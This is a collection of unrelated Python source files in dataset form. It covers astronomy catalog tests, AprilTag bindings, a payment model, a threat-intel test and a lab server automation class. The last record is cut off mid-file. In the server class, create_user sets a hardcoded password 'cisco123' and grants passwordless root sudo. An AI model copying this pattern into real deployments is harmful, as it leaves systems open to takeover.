{"seq_id":"599704270","text":"from utilidades import get_int_positivo\ndef main():\n    den_atual = get_int_positivo('Enter the first denominator: ')\n    numerador = 1\n    somatorio = 0\n    while den_atual >= 1:\n        if numerador % 2 == 0:\n            # alternating series: even-numbered fractions are subtracted\n            somatorio -= (numerador/den_atual)\n        else:\n            somatorio += (numerador/den_atual)\n        den_atual -= numerador\n        numerador += 1\n    print(f'Sum: {somatorio:.2f}')\n    \n\nmain()\n","sub_path":"Fabio03_For/Fabio03_19_soma_fracoes_3.py","file_name":"Fabio03_19_soma_fracoes_3.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"536005214","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\nfrom __future__ import absolute_import, division, print_function, unicode_literals\nfrom numpy.testing.utils import assert_allclose\nfrom astropy.tests.helper import assert_quantity_allclose\nfrom astropy import units as u\nfrom ...utils.testing import requires_data, requires_dependency\nfrom ..hess import SourceCatalogHGPS\n\n\n@requires_data('hgps')\nclass TestSourceCatalogHGPS:\n    def setup(self):\n        self.cat = SourceCatalogHGPS()\n\n    def test_source_table(self):\n        assert self.cat.name == 'hgps'\n        assert len(self.cat.table) == 78\n\n    def test_component_table(self):\n        assert len(self.cat.components) == 98\n\n    def test_associations_table(self):\n        assert len(self.cat.associations) == 223\n\n\n@requires_data('hgps')\nclass TestSourceCatalogObjectHGPS:\n    def setup(self):\n        self.cat = SourceCatalogHGPS()\n        # Use HESS J1825-137 as a test source\n        self.source_name = 'HESS J1825-137'\n        self.source = self.cat[self.source_name]\n\n    def test_single_gauss(self):\n        source = self.cat['HESS J1930+188']\n        assert source.data['Spatial_Model'] == 'Gaussian'\n        assert 'Spatial components : HGPSC 097' in str(source)\n\n    def test_multi_gauss(self):\n        source = self.cat['HESS J1825-137']\n        assert source.data['Spatial_Model'] == '3-Gaussian'\n        assert 'Spatial components : HGPSC 065, HGPSC 066, HGPSC 067' in str(source)\n\n    def test_snr(self):\n        source = self.cat['HESS J1713-397']\n        assert source.data['Spatial_Model'] == 'Shell'\n        assert 'Source name : HESS J1713-397' in str(source)\n\n    def test_name(self):\n        assert self.source.name == 
self.source_name\n\n def test_index(self):\n assert self.source.index == 54\n\n def test_data(self):\n data = self.source.data\n assert data['Source_Class'] == 'PWN'\n\n def test_pprint(self):\n self.source.pprint()\n\n def test_str(self):\n ss = self.source.__str__()\n assert 'Source name : HESS J1825-137' in ss\n assert 'Component HGPSC 065:' in ss\n\n def test_model(self):\n model = self.source.spectral_model\n pars = model.parameters\n assert_quantity_allclose(\n pars['amplitude'].quantity,\n u.Quantity(1.716531924e-11, 'TeV-1 cm-2 s-1'),\n )\n assert_quantity_allclose(\n pars['index'].quantity,\n u.Quantity(2.3770857316, ''),\n )\n assert_quantity_allclose(\n pars['reference'].quantity,\n u.Quantity(1.1561109149, 'TeV'),\n )\n\n emin, emax = u.Quantity([1, 1e10], 'TeV')\n desired = u.Quantity(self.source.data['Flux_Spec_PL_Int_1TeV'], 'cm-2 s-1')\n assert_quantity_allclose(model.integral(emin, emax), desired, rtol=0.01)\n\n def test_ecpl_model(self):\n model = self.cat['HESS J0835-455'].spectral_model\n pars = model.parameters\n assert_quantity_allclose(\n pars['amplitude'].quantity,\n u.Quantity(6.408420542586617e-12, 'TeV-1 cm-2 s-1'),\n )\n assert_quantity_allclose(\n pars['index'].quantity,\n u.Quantity(1.3543991614920847, ''),\n )\n assert_quantity_allclose(\n pars['reference'].quantity,\n u.Quantity(1.696938754239, 'TeV'),\n )\n assert_quantity_allclose(\n pars['lambda_'].quantity,\n u.Quantity(0.081517637, 'TeV-1'),\n )\n\n emin, emax = u.Quantity([1, 1e10], 'TeV')\n desired = u.Quantity(self.source.data['Flux_Spec_PL_Int_1TeV'], 'cm-2 s-1')\n assert_quantity_allclose(model.integral(emin, emax), desired, rtol=0.01)\n\n @requires_dependency('matplotlib')\n def test_model_plot(self):\n model = self.source.spectral_model\n erange = [1, 10] * u.TeV\n model.plot(erange)\n\n def test_spatial_model_gaussian(self):\n source = self.cat['HESS J1119-614']\n model = source.spatial_model(emin=1 * u.TeV, emax=1e3 * u.TeV)\n actual = model.amplitude\n desired = 1.52453e-11\n assert_allclose(actual, desired, rtol=1e-3)\n\n def test_spatial_model_shell(self):\n source = self.cat['Vela Junior']\n model = source.spatial_model(emin=1 * u.TeV, emax=1e3 * u.TeV)\n actual = model.amplitude\n desired = 2.33949e-11\n assert_allclose(actual, desired, rtol=1e-3)\n\n def test_spatial_model_point(self):\n source = self.cat['HESS J1826-148']\n model = source.spatial_model(emin=1 * u.TeV, emax=1e3 * u.TeV)\n actual = model.amplitude\n desired = 8.353370e-13\n assert_allclose(actual, desired, rtol=1e-3)","sub_path":"gammapy/catalog/tests/test_hess.py","file_name":"test_hess.py","file_ext":"py","file_size_in_byte":4705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"379263033","text":"from lab.lab_node import LabNode\n\n\nclass Server(LabNode):\n\n _temp_dir = None\n\n @property\n def temp_dir(self):\n if not self._temp_dir:\n import os\n import random\n\n chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_'\n self._temp_dir = os.path.join('/tmp', 'server-tmp-' + ''.join(random.sample(chars, 10)))\n\n if not self._tmp_dir_exists:\n from fabric.api import settings\n\n # if self.run('test -d {0}'.format(self._temp_dir), warn_only=True).return_code:\n # self._tmp_dir_exists = self.run('mkdir -p {0}'.format(self._temp_dir)).return_code == 0\n return self._temp_dir if self._tmp_dir_exists else None\n\n def __init__(self, node_id, role, lab, hostname):\n self._tmp_dir_exists = False\n self._package_manager = None\n self._mac_server_part = 
None\n\n super(Server, self).__init__(node_id=node_id, role=role, lab=lab, hostname=hostname)\n\n def get_package_manager(self):\n if not self._package_manager:\n possible_packages = ['apt-get', 'dnf', 'yum']\n for x in possible_packages:\n if self.run(command='whereis {0}'.format(x)) != x + ':':\n self._package_manager = x\n break\n if not self._package_manager:\n raise RuntimeError('do not know which package manager to use: neither of {0} found'.format(possible_packages))\n return self._package_manager\n\n def construct_settings(self, warn_only, connection_attempts=100):\n import validators\n from lab import with_config\n\n ssh_ip, ssh_username, ssh_password = self.get_ssh()\n ssh_ip = ssh_ip if validators.ipv4(ssh_ip) else self.get_oob()[0]\n\n kwargs = {'host_string': '{user}@{ip}'.format(user=ssh_username, ip=ssh_ip),\n 'connection_attempts': connection_attempts,\n 'warn_only': warn_only}\n if ssh_password == 'ssh_key':\n kwargs['key_filename'] = with_config.KEY_PRIVATE_PATH\n else:\n kwargs['password'] = ssh_password\n return kwargs\n\n def cmd(self, cmd):\n raise NotImplementedError\n\n def run(self, command, in_directory='.', warn_only=False, connection_attempts=100):\n from fabric.api import run, sudo, settings, cd\n from fabric.exceptions import NetworkError\n\n if str(self.get_ssh_ip()) in ['localhost', '127.0.0.1']:\n return self.run_local(command, in_directory=in_directory, warn_only=warn_only)\n\n run_or_sudo = run\n if command.startswith('sudo '):\n command = command.replace('sudo ', '')\n run_or_sudo = sudo\n\n with settings(**self.construct_settings(warn_only=warn_only, connection_attempts=connection_attempts)):\n with cd(in_directory):\n try:\n return run_or_sudo(command)\n except NetworkError as ex:\n if warn_only:\n self.log(message=ex.message, level='warning')\n return ''\n else:\n raise\n\n def reboot(self, wait=300):\n \"\"\"Reboot this server\n :param wait: wait for the server to come up\n \"\"\"\n from fabric.api import reboot, settings\n with settings(**self.construct_settings(warn_only=True)):\n reboot(wait=wait)\n\n @staticmethod\n def run_local(command, in_directory='.', warn_only=False):\n from fabric.api import local, settings, lcd\n\n if in_directory != '.':\n local('mkdir -p {0}'.format(in_directory))\n with settings(warn_only=warn_only):\n with lcd(in_directory):\n return local(command=command, capture=True)\n\n def put(self, local_path, remote_path, is_sudo):\n \"\"\"Faced the normal fabric put to provide server details from the class\n :param local_path:\n :param remote_path:\n :param is_sudo:\n :return:\n \"\"\"\n from fabric.api import put, settings\n\n with settings(**self.construct_settings(warn_only=False)):\n return put(local_path=local_path, remote_path=remote_path, use_sudo=is_sudo)\n\n def put_string_as_file_in_dir(self, string_to_put, file_name, in_directory='.'):\n \"\"\"Put given string as file to remote server\n :param string_to_put:\n :param file_name:\n :param in_directory:\n :return:\n \"\"\"\n from fabric.api import put, settings, cd, lcd, local\n import os\n from StringIO import StringIO\n\n if '/' in file_name:\n raise SyntaxError('file_name can not contain /, use in_directory instead')\n\n use_sudo = True if in_directory.startswith('/') else False\n\n if in_directory != '.':\n self.run(command='{0} mkdir -p {1}'.format('sudo' if use_sudo else '', in_directory))\n\n if str(self.get_ssh_ip()) in ['localhost', '127.0.0.1']:\n with lcd(in_directory):\n local('echo \"{0}\" > {1}'.format(string_to_put, file_name))\n return 
os.path.abspath(os.path.join(in_directory, file_name))\n else:\n with settings(**self.construct_settings(warn_only=False)):\n with cd(in_directory):\n return put(local_path=StringIO(string_to_put), remote_path=file_name, use_sudo=use_sudo)[0]\n\n def get_file_from_dir(self, file_name, in_directory='.', local_path=None):\n \"\"\"Get remote file as string or local file if local_path is specified\n :param file_name:\n :param in_directory:\n :param local_path:\n :return:\n \"\"\"\n from fabric.api import sudo, settings, cd\n\n if '/' in file_name:\n raise SyntaxError('file_name can not contain /, use in_directory instead')\n\n with settings(**self.construct_settings(warn_only=False)):\n with cd(in_directory):\n body = sudo('cat {0}'.format(file_name))\n\n if local_path:\n with open(local_path, 'w') as f:\n f.write(body)\n return local_path\n else:\n return body\n\n def wget_file(self, url, to_directory='.', checksum=None):\n loc = url.split('/')[-1]\n if to_directory != '.':\n self.run('mkdir -p {0}'.format(to_directory))\n self.run(command='test -e {loc} || curl {url} -o {loc}'.format(loc=loc, url=url), in_directory=to_directory)\n if checksum == 'in-file':\n checksum = self.run('curl {0}'.format(url + '.sha256sum.txt')).split()[0]\n\n calc_checksum = self.run(command='sha256sum {loc}'.format(loc=loc), in_directory=to_directory)\n if checksum:\n if calc_checksum.split()[0] != checksum:\n self.run(command='rm {0}'.format(loc), in_directory=to_directory)\n raise RuntimeError('I deleted image {} taken from {} since it is broken (checksum is not matched). Re-run the script'.format(loc, url + '.sha256sum.txt'))\n else:\n self.log('Checksum was not provided and not found in .sha256sum.txt. Calculated checksum is {}'.format(calc_checksum))\n return self.run(command='readlink -f {0}'.format(loc), in_directory=to_directory)\n\n def check_or_install_packages(self, package_names):\n pm = self.get_package_manager()\n\n for package_name in package_names.split():\n if self.run(command='whereis {0}'.format(package_name)) == package_name + ':':\n self.run(command='sudo {0} install -y {1}'.format(pm, package_names))\n\n def clone_repo(self, repo_url, local_repo_dir=None, tags=None, patch=None):\n import urlparse\n\n local_repo_dir = local_repo_dir or urlparse.urlparse(repo_url).path.split('/')[-1].strip('.git')\n\n self.check_or_install_packages(package_names='git')\n self.run(command='test -d {0} || git clone -q {1} {0}'.format(local_repo_dir, repo_url))\n self.run(command='git pull -q', in_directory=local_repo_dir)\n if patch:\n self.run(command='git fetch {0} && git checkout FETCH_HEAD'.format(patch))\n elif tags:\n self.run(command='git checkout tags/{0}'.format(tags), in_directory=local_repo_dir)\n return self.run(command='pwd', in_directory=local_repo_dir)\n\n def create_user(self, new_username):\n from lab import with_config\n\n tmp_password = 'cisco123'\n if not self.run(command='grep {0} /etc/passwd'.format(new_username), warn_only=True):\n encrypted_password = self.run(command='openssl passwd -crypt {0}'.format(tmp_password))\n self.run(command='sudo adduser -p {0} {1}'.format(encrypted_password.split()[-1], new_username)) # encrypted password may contain Warning\n self.run(command='sudo echo \"{0} ALL=(root) NOPASSWD:ALL\" | tee -a /etc/sudoers.d/{0}'.format(new_username))\n self.run(command='sudo chmod 0440 /etc/sudoers.d/{0}'.format(new_username))\n self.set_ssh_creds(username=new_username, password=tmp_password)\n with open(with_config.KEY_PUBLIC_PATH) as f:\n 
self.put_string_as_file_in_dir(string_to_put=f.read(), file_name='authorized_keys', in_directory='.ssh')\n self.run(command='sudo chmod 700 .ssh')\n self.run(command='sudo chmod 600 .ssh/authorized_keys')\n self.set_ssh_creds(username=new_username, password='ssh_key')\n\n def ping(self, port=22):\n import socket\n\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.settimeout(1)\n try:\n s.connect((str(self.get_ssh_ip()), port))\n res = True\n except (socket.timeout, socket.error):\n res = False\n finally:\n s.close()\n return res\n \n def actuate_hostname(self, refresh=True):\n if not hasattr(self, '_hostname') or refresh:\n self._hostname = self.run('hostname').stdout.strip()\n return self._hostname\n\n def form_mac(self, mac_pattern):\n return '00:{lab:02}:00:{role_id}:{count:02}:{net}'.format(lab=self._lab.get_id(), role_id=self.lab().ROLES[self.get_role()], count=self._n, net=mac_pattern)\n\n def list_ip_info(self, connection_attempts=100):\n ans_a = self.run('ip -o a', connection_attempts=connection_attempts, warn_only=True)\n if not ans_a:\n return {}\n ans_l = self.run('ip -o l', connection_attempts=connection_attempts, warn_only=True)\n name_ipv4_ipv6 = {}\n for line in ans_a.split('\\n'):\n _, nic_name, other = line.split(' ', 2)\n name_ipv4_ipv6.setdefault(nic_name, {'ipv4': None, 'ipv6': None})\n if 'inet6' in other:\n name_ipv4_ipv6[nic_name]['ipv6'] = other.split()[1].strip()\n else:\n name_ipv4_ipv6[nic_name]['ipv4'] = other.split()[1].strip()\n\n result = {}\n for line in ans_l.split('\\n'):\n number, nic_name, other = line.split(':', 2)\n nic_name = nic_name.strip()\n if nic_name == 'lo':\n continue\n status, mac_part = other.split('link/ether')\n mac = mac_part.split(' brd ')[0].strip()\n ipv4 = name_ipv4_ipv6.get(nic_name, {'ipv4': None})['ipv4']\n ipv6 = name_ipv4_ipv6.get(nic_name, {'ipv6': None})['ipv6']\n result[nic_name] = {'mac': mac.upper(), 'ipv4': ipv4, 'ipv6': ipv6}\n return result\n\n def is_nics_correct(self):\n actual_nics = self.list_ip_info(connection_attempts=1)\n if not actual_nics:\n return False\n\n for nic in self.get_nics().values():\n mac = nic.get_mac() # be careful : after bonding all interfaces of the bond get mac of the first one\n ip, _ = nic.get_ip_and_mask()\n prefix_len = nic.get_net().prefixlen\n ip = ip + '/' + str(prefix_len)\n master_nic_name = nic.get_name()\n if master_nic_name not in actual_nics:\n self.log(message='has no master NIC {}'.format(master_nic_name), level='warning')\n return False\n actual_ip = actual_nics[master_nic_name]['ipv4']\n if ip != actual_ip: # this ip might be re-assign to the bridge which has this NIC inside\n if ip != actual_nics['br-' + master_nic_name]['ipv4']:\n self.log(message='NIC {} has different IP actual: {} requested: {}'.format(nic.get_name(), actual_ip, ip), level='warning')\n return False\n for slave_nic_name, _ in sorted(nic.get_slave_nics().items()):\n if slave_nic_name not in actual_nics:\n self.log(message='has no slave NIC {}'.format(slave_nic_name), level='warning')\n return False\n actual_mac = actual_nics[slave_nic_name]['mac'].upper()\n if actual_mac != mac.upper():\n self.log(message='NIC {} has different mac: actual {} requested {}'.format(slave_nic_name, actual_mac, mac), level='warning')\n return False\n return True\n\n def register_rhel(self, rhel_subscription_creds_url):\n import requests\n import json\n\n text = requests.get(rhel_subscription_creds_url).text\n rhel_json = json.loads(text)\n rhel_username = rhel_json['rhel-username']\n rhel_password = 
rhel_json['rhel-password']\n        rhel_pool_id = rhel_json['rhel-pool-id']\n\n        repos_to_enable = ['--enable=rhel-7-server-rpms',\n                           '--enable=rhel-7-server-optional-rpms',\n                           '--enable=rhel-7-server-extras-rpms',\n                           '--enable=rhel-7-server-openstack-7.0-rpms',\n                           '--enable=rhel-7-server-openstack-7.0-director-rpms']\n        status = self.run(command='subscription-manager status', warn_only=True)\n        if 'Overall Status: Current' not in status:\n            self.run(command='sudo subscription-manager register --force --username={0} --password={1}'.format(rhel_username, rhel_password))\n            available_pools = self.run(command='sudo subscription-manager list --available')\n            if rhel_pool_id not in available_pools:\n                raise ValueError('Provided RHEL pool id \"{}\" is not in the list of available pools, please check your RHEL credentials here {}'.format(rhel_pool_id, rhel_subscription_creds_url))\n\n            self.run(command='sudo subscription-manager attach --pool={0}'.format(rhel_pool_id))\n            self.run(command='sudo subscription-manager repos --disable=*')\n            self.run(command='sudo subscription-manager repos ' + ' '.join(repos_to_enable))\n","sub_path":"lab/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":14686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"104798798","text":"\nfrom datetime import datetime, timedelta\nfrom time import sleep\n\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.db import IntegrityError, models, transaction\nfrom billservice.models import Account\n\n\n\nPAYMENT_MODE_CHOICES = (\n    (0, 'REAL'),\n    (1, 'TEST'),\n)\n\nclass Payment(models.Model):\n    account = models.ForeignKey(Account, related_name='webmoney_account_set')\n    created = models.DateTimeField(auto_now_add=True, editable=False)\n\n    purse = models.CharField(max_length=32)\n\n    amount = models.DecimalField(decimal_places=2, max_digits=9)\n\n    mode = models.PositiveSmallIntegerField(choices=PAYMENT_MODE_CHOICES)\n\n    sys_invs_no = models.PositiveIntegerField()\n    sys_trans_no = models.PositiveIntegerField()\n    sys_trans_date = models.DateTimeField()\n\n    payer_purse = models.CharField(max_length=13)\n    payer_wm = models.CharField(max_length=12)\n\n    paymer_number = models.CharField(max_length=30, blank=True)\n    paymer_email = models.EmailField(blank=True)\n\n    telepat_phonenumber = models.CharField(max_length=30, blank=True)\n    telepat_orderid = models.CharField(max_length=30, blank=True)\n\n    payment_creditdays = models.PositiveIntegerField(blank=True, null=True)\n    \n    def __unicode__(self):\n        # NOTE: the model defines no payment_no field; the WebMoney invoice\n        # number (sys_invs_no) is used here as the payment identifier.\n        return \"%s - %s WM%s\" % (self.sys_invs_no, self.amount, self.purse)\n","sub_path":"webadmin/ebscab/paymentgateways/webmoney/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"125819164","text":"import os.path\nimport unittest\nfrom unittest.mock import patch\n\nfrom core.threat import IPDetails\n\n\nclass IPDetailsTC(unittest.TestCase):\n    # test case: 69.43.161.174\n    with open(os.path.join(os.path.dirname(__file__), 'test_fixture.json'),\n              encoding='utf-8') as fp:\n        response_text = fp.read()\n\n    def test_simple(self):\n        with patch('core.threat.IPDetails.fetch') as gt:\n            gt.return_value = self.response_text\n            ipd = IPDetails('69.43.161.174')\n            self.assertEqual(ipd.is_valid, True)\n            self.assertEqual(ipd.id, \"4ea30af203b04d5a140035ce\")\n            self.assertEqual(ipd.reputation_val, \"2\")\n            self.assertEqual(ipd.first_activity, 1319315215)\n            
self.assertEqual(ipd.last_activity, 1342955302)\n self.assertEqual(len(ipd.activities), 50)\n self.assertEqual(ipd.activities[0], {\n 'activity_type': 'Malicious Host',\n 'first_date': 1319315215,\n 'last_date': 1322894309\n })\n self.assertEqual(set(ipd.activity_types),\n set(['Malicious Host', 'Malware Domain',\n 'C&C', 'Spamming']))\n","sub_path":"core/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"248789308","text":"#!/usr/bin/env python\nimport ctypes\nfrom ctypes import POINTER\nfrom ctypes import Structure\nfrom ctypes import c_int\nfrom ctypes import c_int32\nfrom ctypes import c_int64\nfrom ctypes import c_uint8\nfrom ctypes import c_float\nfrom ctypes import c_double\n\nimport cv2\nimport numpy as np\n\n\n# Import AprilTag C library\nLIBPATH = \"/usr/local/lib/libapriltag.so\"\nlib = ctypes.CDLL(LIBPATH)\n\n\nclass _ImageU8(Structure):\n \"\"\"Wraps image_u8 C struct.\"\"\"\n _fields_ = [\n ('width', c_int),\n ('height', c_int),\n ('stride', c_int),\n ('buf', POINTER(c_uint8))\n ]\n\n\nclass _Matd(Structure):\n \"\"\"Wraps matd C struct.\"\"\"\n _fields_ = [\n ('nrows', c_int),\n ('ncols', c_int),\n ('data', ctypes.c_double*1),\n ]\n\n\nclass _ZArray(Structure):\n \"\"\"Wraps zarray C struct.\"\"\"\n _fields_ = [\n ('el_sz', ctypes.c_size_t),\n ('size', c_int),\n ('alloc', c_int),\n ('data', ctypes.c_void_p)\n ]\n\n\nclass _AprilTagFamily(Structure):\n \"\"\"Wraps apriltag_family C struct.\"\"\"\n _fields_ = [\n ('ncodes', c_int32),\n ('codes', POINTER(c_int64)),\n ('black_border', c_int32),\n ('d', c_int32),\n ('h', c_int32),\n ('name', ctypes.c_char_p),\n ]\n\n\nclass _AprilTagDetection(Structure):\n \"\"\"Wraps apriltag_detection C struct.\"\"\"\n _fields_ = [\n ('family', POINTER(_AprilTagFamily)),\n ('id', c_int),\n ('hamming', c_int),\n ('goodness', c_float),\n ('decision_margin', c_float),\n ('H', POINTER(_Matd)),\n ('c', ctypes.c_double*2),\n ('p', (ctypes.c_double*2)*4)\n ]\n\n\nclass _AprilTagDetector(Structure):\n \"\"\"Wraps apriltag_detector C struct.\"\"\"\n _fields_ = [\n ('nthreads', c_int),\n ('quad_decimate', c_float),\n ('quad_sigma', c_float),\n ('refine_edges', c_int),\n ('refine_decode', c_int),\n ('refine_pose', c_int),\n ('debug', c_int),\n ('quad_contours', c_int),\n ]\n\n\ndef ptr_to_array2d(datatype, ptr, rows, cols):\n array_type = (datatype * cols) * rows\n array_buf = array_type.from_address(ctypes.addressof(ptr))\n return np.ctypeslib.as_array(array_buf, shape=(rows, cols))\n\n\ndef image_u8_get_array(img_ptr):\n return ptr_to_array2d(c_uint8,\n img_ptr.contents.buf.contents,\n img_ptr.contents.height,\n img_ptr.contents.stride)\n\n\ndef matd_get_array(mat_ptr):\n return ptr_to_array2d(c_double,\n mat_ptr.contents.data,\n int(mat_ptr.contents.nrows),\n int(mat_ptr.contents.ncols))\n\n\ndef convert_image(img):\n height = img.shape[0]\n width = img.shape[1]\n\n lib.image_u8_create.restype = ctypes.POINTER(_ImageU8)\n c_img = lib.image_u8_create(width, height)\n tmp = image_u8_get_array(c_img)\n\n # Copy the opencv image into the destination array, accounting for the\n # difference between stride & width.\n tmp[:, :width] = img\n\n # tmp goes out of scope here but we don't care because\n # the underlying data is still in c_img.\n return c_img\n\n\ndef tag36h11_create():\n lib.tag36h11_create.restype = POINTER(_AprilTagFamily)\n family = lib.tag36h11_create()\n return family\n\n\ndef tag36h10_create():\n 
lib.tag36h10_create.restype = POINTER(_AprilTagFamily)\n family = lib.tag36h10_create()\n return family\n\n\ndef tag36artoolkit_create():\n lib.tag36artoolkit_create.restype = POINTER(_AprilTagFamily)\n family = lib.tag36artoolkit_create()\n return family\n\n\ndef tag25h9_create():\n lib.tag25h9_create.restype = POINTER(_AprilTagFamily)\n family = lib.tag25h9_create()\n return family\n\n\ndef tag25h7_create():\n lib.tag25h7_create.restype = POINTER(_AprilTagFamily)\n family = lib.tag25h7_create()\n return family\n\n\ndef apriltag_detector_create():\n lib.apriltag_detector_create.restype = POINTER(_AprilTagDetector)\n detector = lib.apriltag_detector_create()\n return detector\n\n\ndef apriltag_detector_add_family(detector, family):\n lib.apriltag_detector_add_family_bits(detector, family, 2)\n\n\ndef apriltag_detector_detect(detector, c_img):\n lib.apriltag_detector_detect.restype = POINTER(_ZArray)\n results = lib.apriltag_detector_detect(detector, c_img)\n return results\n\n\ndef apriltag_detections_destroy(detections):\n lib.apriltag_detections_destroy(detections)\n\n\ndef image_u8_destroy(c_img):\n lib.image_u8_destroy(c_img)\n\n\nclass AprilTag:\n def __init__(self, **kwargs):\n self.family = kwargs[\"family\"]\n self.id = kwargs[\"id\"]\n self.hamming = kwargs[\"hamming\"]\n self.goodness = kwargs[\"goodness\"]\n self.decision_margin = kwargs[\"decision_margin\"]\n self.H = matd_get_array(kwargs[\"H\"]).copy()\n self.c = np.ctypeslib.as_array(kwargs[\"c\"], shape=(2,)).copy()\n self.p = np.ctypeslib.as_array(kwargs[\"p\"], shape=(4, 2)).copy()\n\n def draw_corners(self, img):\n for corner in self.p:\n pt = (int(corner[0]), int(corner[1]))\n img = cv2.circle(img, pt, 10, (0, 255, 0), -1)\n\n def draw_id(self, img):\n # tag_width_px = self.p[0][0] - self.p[1][0]\n\n text = str(self.id)\n center = (int(self.c[0] - 15), int(self.c[1]))\n font = cv2.FONT_HERSHEY_DUPLEX\n color = (0, 255, 0)\n thickness = 2\n cv2.putText(img, text, center, font, 0.7, color, thickness)\n\n\nclass AprilTagDetector:\n \"\"\"Custom AprilTag library wrapper\"\"\"\n\n def __init__(self, **kwargs):\n # Tag detector\n self.detector = apriltag_detector_create()\n self.detector.contents.nthreads = kwargs.get(\"nthreads\", 1)\n self.detector.contents.quad_decimate = kwargs.get(\"quad_decimate\", 1.0)\n self.detector.contents.quad_sigma = kwargs.get(\"quad_sigma\", 0.0)\n self.detector.refine_edges = kwargs.get(\"refine_edges\", 1)\n self.detector.refine_decode = kwargs.get(\"refine_decode\", 0)\n self.detector.refine_pose = kwargs.get(\"refine_pose\", 0)\n\n # Tag family\n family_str = kwargs.get(\"family\", \"36h11\")\n family = None\n if family_str == \"36h11\":\n family = tag36h11_create()\n elif family_str == \"36h10\":\n family = tag36h10_create()\n elif family_str == \"36artoolkit\":\n family = tag36artoolkit_create()\n elif family_str == \"25h9\":\n family = tag25h9_create()\n elif family_str == \"25h7\":\n family = tag25h7_create()\n else:\n raise RuntimeError(\"Unrecognized tag family: %s\", family_str)\n\n # Add tag family to detector\n apriltag_detector_add_family(self.detector, family)\n\n def detect(self, img):\n # Make sure image is grayscale\n gray_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n # Create an ImageU8 instance for the detector and detect tags\n imgu8 = convert_image(gray_img)\n detections = apriltag_detector_detect(self.detector, imgu8)\n\n # Loop through detections\n results = []\n for i in range(detections.contents.size):\n # Extract the data for each apriltag that was identified\n tag 
= ctypes.POINTER(_AprilTagDetection)()\n el_sz = detections.contents.el_sz\n data = detections.contents.data\n ctypes.memmove(ctypes.byref(tag), data + i * el_sz, el_sz)\n\n # Create AprilTag object instance\n results.append(\n AprilTag(family=tag.contents.family,\n id=tag.contents.id,\n hamming=tag.contents.hamming,\n goodness=tag.contents.goodness,\n decision_margin=tag.contents.decision_margin,\n H=tag.contents.H,\n c=tag.contents.c,\n p=tag.contents.p)\n )\n\n # Clean up - THIS IS VERY IMPORTANT! ELSE MEMORY LEAKS!\n apriltag_detections_destroy(detections)\n image_u8_destroy(imgu8)\n\n return results\n","sub_path":"prototype/vision/apriltag.py","file_name":"apriltag.py","file_ext":"py","file_size_in_byte":8046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"326867926","text":"# Mark Bauman 2015\n##Part three of the parallel optimum number of trees test for random forest\n#This creates a dataFrame object of all rmse's and corresponding number of trees,\n#then plots it to see where it has leveled off.\n#Pick the number of trees that gives you a good enough estimate based on rmse\n#while still saving some computation time (pick the number of estimators\n#corresponding to the point in the graph where it approximately levels off)\n#first run part 1 and 2 of this series\n\nimport glob\nimport os, sys\nimport pandas as pd\nimport numpy as np\nfrom pandas import Series, DataFrame\n\n#loop through and retrieve rmse from filenames\n\nfilePath = '...filePath.../num_trees*' #initialize filepath\n\nrmseTable = DataFrame() #Initialize table with rmse vals\n\nfor fn in glob.glob(filePath):\n if os.path.isfile(fn):\n fn = fn.split(':')\n numTrees = int(fn[1])\n rmse = float(fn[2])\n\n dataAppend = DataFrame([[numTrees, rmse]], columns = ('numTrees', 'RMSE'))\n rmseTable = rmseTable.append(dataAppend)\n\n#sort table according to number of trees\nrmseTable = rmseTable.sort('numTrees')\n\n#Plot results: \nimport matplotlib.pyplot as plt\nplt.figure()\nplt.ion()\nplt.plot(rmseTable['RMSE'])\nplt.title('Performance of random forest')\nplt.xlabel('n_estimators')\nplt.ylabel('RMSE')\nplt.show() \n\n\n \n","sub_path":"Optimal_num_estimators/RandomForestOptimalNumTrees_3.py","file_name":"RandomForestOptimalNumTrees_3.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"107653650","text":"from __future__ import print_function\nfrom time import sleep\nfrom datetime import datetime\nfrom sucks import *\nfrom pytz import timezone\nimport os\n\ndef build_api():\n config = {\n 'device_id': EcoVacsAPI.md5(str(time.time())),\n 'email': os.environ['email'],\n 'password': EcoVacsAPI.md5(os.environ['password']),\n 'country': os.environ['country'],\n 'continent': os.environ['continent']\n }\n\n api = EcoVacsAPI(config['device_id'],config['email'],config['password'],\n config['country'],config['continent'])\n vac_id = api.devices()[0]\n vacbot = VacBot(api.uid,api.REALM,api.resource, api.user_access_token, vac_id, config['continent'])\n return vacbot\n\ndef perform_action(action):\n vacbot = build_api()\n vacbot.connect_and_wait_until_ready()\n vacbot.run(action)\n sleep(1)\n vacbot.disconnect()\n return vacbot\n\ndef perform_service():\n vacbot = build_api()\n vacbot.connect_and_wait_until_ready()\n vacbot.run(Move('turn_around'))\n sleep(2)\n vacbot.run(Move('forward'))\n vacbot.disconnect()\n\n# --------------- Helpers that build all of the responses 
